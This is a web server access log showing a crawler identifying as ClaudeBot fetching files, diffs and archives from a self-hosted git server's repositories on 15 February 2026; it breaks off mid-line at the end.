-[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md?display=rendered" [Client 216.73.216.188] [Length 13410] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 204112] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Flabels" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/bf87175f515287fd25d175843915ffa6178025eb.tar.gz" [Client 216.73.216.188] [Length 234007] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 14287] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2FDockerfile" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.tar.gz" [Client 216.73.216.188] [Length 25531034] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fyearly" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Frequirements.txt" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 216.73.216.188] [Length 13505] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 216.73.216.188] [Length 12143] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 234363] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 216.73.216.188] [Length 11688] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 216.73.216.188] [Length 11692] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 216.73.216.188] [Length 11527] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 10860] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 234317] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=rendered" [Client 216.73.216.188] [Length 10954] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 216.73.216.188] [Length 11663] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 156410] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fweekly" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fcontributors" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 216.73.216.188] [Length 12163] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 216.73.216.188] [Length 11689] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9844] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 156428] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 120366] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 11081] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=Dockerfile" [Client 216.73.216.188] [Length 18883] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.bundle" [Client 216.73.216.188] [Length 12785552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 12741] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 216.73.216.188] [Length 11521] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.bundle" [Client 216.73.216.188] [Length 12783383] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2FDockerfile" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fhalfweekly" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/archive/3181052619700dceeeef81a9a0851130498f177e.tar.gz" [Client 216.73.216.188] [Length 43390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 190790] [Gzip 12.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 17218] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 216.73.216.188] [Length 11683] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 191292] [Gzip 12.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/18fa480c84b358da8bf50d54057f53591759225f.tar.gz" [Client 216.73.216.188] [Length 234504] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 120353] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 17219] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 9936] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 11910] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr 